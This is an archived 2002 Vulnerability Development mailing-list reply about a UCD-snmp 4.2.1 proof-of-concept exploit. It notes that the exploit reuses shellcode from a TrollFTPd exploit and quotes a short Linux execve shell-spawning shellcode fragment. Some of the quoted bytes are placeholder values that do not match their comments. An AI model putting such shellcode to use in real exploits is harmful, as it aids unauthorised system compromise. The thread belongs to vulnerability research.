Vulnerability Development mailing list archives

RE: UCD-snmp 4.2.1 exploit - proof of concept

From: Mike Tone <simpletone () mbox com au>
Date: Wed, 20 Feb 2002 11:38:23 +1100

just to note:

The shellcode is exactly the same as that from zen-parse' local exploit
for TrollFTPd (1.26)

see: http://www.securityfocus.com/archive/1/203874

----
"\x68\x55\x55\x55\x55"       // push    dword 68732f6eh
   "\x68\x55\x55\x55\x55"       // push    dword 69622f2fh
   "\x89\xe3"                   // mov     ebx, esp
   "\x51"                       // push    ecx
   "\x53"                       // push ebx
   "\x89\xe1"                   // mov  ecx, esp
   "\xb0\x0b"                   // mov  al, 11
   "\xcd\x80";                  // int     80h
----


---------------------------------------------------------------------
Would you like to receive faxes to your personal email address?
You can with mBox.  Visit http://www.mbox.com.au/fax

Current thread:

UCD-snmp 4.2.1 exploit - proof of concept zenparse (Feb 18)
- Re: UCD-snmp 4.2.1 exploit - proof of concept Blue Boar (Feb 19)
- <Possible follow-ups>
- re: UCD-snmp 4.2.1 exploit - proof of concept zen-parse (Feb 19)
- Re: UCD-snmp 4.2.1 exploit - proof of concept xbud (Feb 19)
- RE: UCD-snmp 4.2.1 exploit - proof of concept Mike Tone (Feb 19)